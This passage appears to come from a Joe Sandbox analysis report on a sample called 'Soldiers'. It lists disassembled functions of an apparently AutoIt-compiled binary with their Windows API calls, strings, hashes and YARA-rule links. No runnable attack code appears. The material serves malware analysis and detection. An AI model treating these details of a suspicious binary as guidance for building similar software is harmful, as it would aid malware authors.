                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 8d9fc087888aa5985717163325e9b60314fa9c2c1d7057bd4074fe1074273549
                                                          • Instruction ID: ebfd98ead91648cfe92190546ef9278d172306046bc7e849ddf76c20570c9c4b
                                                          • Opcode Fuzzy Hash: 8d9fc087888aa5985717163325e9b60314fa9c2c1d7057bd4074fe1074273549
                                                          • Instruction Fuzzy Hash: 6D11BF71310208BFEF218E54DCA1EBB3B6EEB893A4F104129F9189B2D0D631AC5097A0
                                                          Function 0096722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,008E2004), ref: 008E214F
                                                            • Part of subcall function 008E2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,008E2004,?,?,static,00970980,?,?,?,00000096,00000096,?), ref: 008E2163
                                                            • Part of subcall function 008E2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,008E2004,?,?,static,00970980,?,?,?,00000096,00000096), ref: 008E216D
                                                          • GetWindowRect.USER32(00000000,?,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00967296
                                                          • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 009672B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: eb4415922e0fa427cfd9c3253a15294e9a50a6e64ca770ed96fbbf094e1b78b9
                                                          • Instruction ID: 49d2caf31ea6d7dc7999667bcf3cd9dc39cccc618730f8ddb71fa3f1709cf3db
                                                          • Opcode Fuzzy Hash: eb4415922e0fa427cfd9c3253a15294e9a50a6e64ca770ed96fbbf094e1b78b9
                                                          • Instruction Fuzzy Hash: 0921177262420AAFDB04DFA8CC46AEABBA8EB48314F004619FD55D3250E635A8919B50
                                                          Function 008F31BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 0093032B
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00930375
                                                            • Part of subcall function 00900284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F2A58,?,00008000), ref: 009002A4
                                                            • Part of subcall function 009009C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 009009E4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: 4dba1ebab86b4d8207aed1aef118d144939ed04898f1a216da86756eea035248
                                                          • Instruction ID: a93d3d34628e26654f6b2b765109f74f8e3780170b00c1077f1b3cda97c49f58
                                                          • Opcode Fuzzy Hash: 4dba1ebab86b4d8207aed1aef118d144939ed04898f1a216da86756eea035248
                                                          • Instruction Fuzzy Hash: 73219271A1428C9BCF519FE8C805BEE7BFCEF89314F00405AE504E7281DBB459889FA1
                                                          Function 00966F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 00966FC7
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00966FD6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 6debf4af25e26ab96e6aec5e2aa35b5a73904dfdf15d7c126c7e1eda7a445a5f
                                                          • Instruction ID: 8b7c9193a65d6788ce6be32bdb3aff3f3a3ae1dd591cb687d6e151dc3196de5a
                                                          • Opcode Fuzzy Hash: 6debf4af25e26ab96e6aec5e2aa35b5a73904dfdf15d7c126c7e1eda7a445a5f
                                                          • Instruction Fuzzy Hash: D1118872104208AFEB108E64ED85EFB3BAEEB45368F504714F964D31E0C735EC90AB60
                                                          Function 00943156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 009431C9
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009431E8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: da7472914bd2605797d8dad7ccdf2c47e4d46a47aa2b4051405c5effb33d03f9
                                                          • Instruction ID: 6c737b8f4e3e31d47207ecdf323c147cee3d8e1fc6843bd5b9f043def3959cc8
                                                          • Opcode Fuzzy Hash: da7472914bd2605797d8dad7ccdf2c47e4d46a47aa2b4051405c5effb33d03f9
                                                          • Instruction Fuzzy Hash: 82110831919114ABDB20DBF8DC45FADB7BCAB0A310F148162E916A7290D774FF05DB91
                                                          Function 009528A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0095202F,?,?,?), ref: 009528F8
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00952921
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: 20d4b3ed01a1cf35bfe073b6e50c0d18069b767e1fe3170b9753d91cbda3f2c7
                                                          • Instruction ID: 490b429e9ec4e3b5f1b008aeb09a4a75a96d2573c65a19d30f00f87f65249489
                                                          • Opcode Fuzzy Hash: 20d4b3ed01a1cf35bfe073b6e50c0d18069b767e1fe3170b9753d91cbda3f2c7
                                                          • Instruction Fuzzy Hash: 4611A370501226BAEB29CF928C89EB7FB6CFF06756F10452AFA4956140E3746898D7E0
                                                          Function 00958475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009586E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0095849D,?,00000000,?,?), ref: 009586F7
                                                          • #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009584A0
                                                          • #9.WSOCK32(00000000,?,00000000), ref: 009584DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 626452242-2422070025
                                                          • Opcode ID: 284f6e78ac2f48264f515487be3f3a0600733a2012e6184537f49bf6c4af8bc7
                                                          • Instruction ID: a6954ad3b7b12c03d1e90fa04f9d5f288152fadc0c55acc0380e4ac602399252
                                                          • Opcode Fuzzy Hash: 284f6e78ac2f48264f515487be3f3a0600733a2012e6184537f49bf6c4af8bc7
                                                          • Instruction Fuzzy Hash: 5611E53120020AABDB20EF64CC46FBFB728FF40711F104516FE15A7291DB71A804CB55
                                                          Function 009399BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                            • Part of subcall function 0093B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0093B7BD
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?,?,?,ListBox,?,?,ComboBox), ref: 00939A2B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: f48bd3cb05a02c870531b047fd84e10af7dcfe912f52d828397158648976d94f
                                                          • Instruction ID: 63d7986bd3cf6e8ae16cdff3fbe974e7509a3ff7ee4610381d9b9f6500f85b2f
                                                          • Opcode Fuzzy Hash: f48bd3cb05a02c870531b047fd84e10af7dcfe912f52d828397158648976d94f
                                                          • Instruction Fuzzy Hash: FB01B571A41128AB8F14EBB8CC56EFE7369FF96320F100719F966972C1DA3159089A51
                                                          Function 0094934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: 41038492f3e4842de0a0ae249c237830725b946961fd34d5270dfc3035a5e6a8
                                                          • Instruction ID: cb9db7ef9a854b8f54f11617191b5eca20eb5fee7e8a6d56cd316bec45d2200d
                                                          • Opcode Fuzzy Hash: 41038492f3e4842de0a0ae249c237830725b946961fd34d5270dfc3035a5e6a8
                                                          • Instruction Fuzzy Hash: 4C01B9729042587EDB18CAA8C85AFBE7BFC9B55301F04459EF552D21C1E579A6048B60
                                                          Function 009398B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                            • Part of subcall function 0093B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0093B7BD
                                                          • SendMessageW.USER32(?,00000180,00000000,?,?,?,ListBox,?,?,ComboBox), ref: 00939923
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: b1c8c517bc0b65873fee5e2278cab6743ceac3980d06fdb6cd9f81a287b13d26
                                                          • Instruction ID: b291174a52e8d6ce5d799017a43678fbbb8854d7aa74c64bcdae29bb464e2473
                                                          • Opcode Fuzzy Hash: b1c8c517bc0b65873fee5e2278cab6743ceac3980d06fdb6cd9f81a287b13d26
                                                          • Instruction Fuzzy Hash: C501DB72F41118ABCF14EBB4C956FFF73ADEF55340F100119B946A3281DA555F089AB2
                                                          Function 0093993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                            • Part of subcall function 0093B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0093B7BD
                                                          • SendMessageW.USER32(?,00000182,?,00000000,?,?,ListBox,?,?,ComboBox), ref: 009399A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 5d6994b4cb2c170ea31c731d6637052779739b608919180b70ea5de35cd6d5ac
                                                          • Instruction ID: e0460faddce04bda384778634307b977d55d61564d4ae39dabd9719e16cdca84
                                                          • Opcode Fuzzy Hash: 5d6994b4cb2c170ea31c731d6637052779739b608919180b70ea5de35cd6d5ac
                                                          • Instruction Fuzzy Hash: 3C01DB72B41118A7CF10EBB8C916FFF73ADDF51340F100119B946A3281DA654F089AB2
                                                          Function 009454E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: bfc75fdfc3b45f3604bbd4542d6cb75d69db52631e88873bdf9b14ba624224a1
                                                          • Instruction ID: 14869b080c070bbf8bd525954940f22634da3b3b7bde54feef75bd07cc029d58
                                                          • Opcode Fuzzy Hash: bfc75fdfc3b45f3604bbd4542d6cb75d69db52631e88873bdf9b14ba624224a1
                                                          • Instruction Fuzzy Hash: 26E0D1735042295BD710A799AC45FABF7ECEB55771F000057FD04D7051D5609945C7D0
                                                          Function 00938892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009388A0
                                                            • Part of subcall function 00903588: _doexit.LIBCMT ref: 00903592
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Message_doexit
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 1993061046-4017498283
                                                          • Opcode ID: 5eb3ed99f6a505fa936b5f6a6d5ce22ee3a3e2873ca4babde4897e27580a7b71
                                                          • Instruction ID: 223f62d338593a8d271131a4279fa38418d40faf92752a158f4c34caf6fb55f2
                                                          • Opcode Fuzzy Hash: 5eb3ed99f6a505fa936b5f6a6d5ce22ee3a3e2873ca4babde4897e27580a7b71
                                                          • Instruction Fuzzy Hash: 8ED05E3338535836E22537A86C1BFDB7B4CCB85B55F14842AFB4CE51D38AD689D082E6
                                                          Function 0091B4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0091B544: _memset.LIBCMT ref: 0091B551
                                                            • Part of subcall function 00900B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0091B520,?,?,?,008E100A), ref: 00900B79
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,008E100A), ref: 0091B524
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008E100A), ref: 0091B533
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0091B52E
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                          • API String ID: 3158253471-631824599
                                                          • Opcode ID: 3cd0806d61f2d600eda086c3e24b34ede5c220c8da1460bbc3962f00ad664e0d
                                                          • Instruction ID: 93c3a8ee12e8d8d3ee621e60fb52819249fa7f129db2e01f3808335d1ac94dc7
                                                          • Opcode Fuzzy Hash: 3cd0806d61f2d600eda086c3e24b34ede5c220c8da1460bbc3962f00ad664e0d
                                                          • Instruction Fuzzy Hash: 77E092713087158FD330AF75E805B82BAE5EF44704F10891DF45AC2381EBB4D584CB91
                                                          Function 00920251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00920091
                                                            • Part of subcall function 0095C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0092027A,?), ref: 0095C6E7
                                                            • Part of subcall function 0095C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0095C6F9
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00920289
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                          • String ID: WIN_XPe
                                                          • API String ID: 582185067-3257408948
                                                          • Opcode ID: 0ca734403f30ac0871007082f6ac7477f11ff639551b91dbd70cb3b29c75a73f
                                                          • Instruction ID: bb99344b4257efa0aae19d193cc36ac0cb176deb1fdf86d7382422155a6fc2c2
                                                          • Opcode Fuzzy Hash: 0ca734403f30ac0871007082f6ac7477f11ff639551b91dbd70cb3b29c75a73f
                                                          • Instruction Fuzzy Hash: F9F0397185911ADFDB15DBA1D988BECBBF8BB88300F240885E106A20A1CB745F84DF20
                                                          Function 00949EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00949EB5
                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00949ECC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
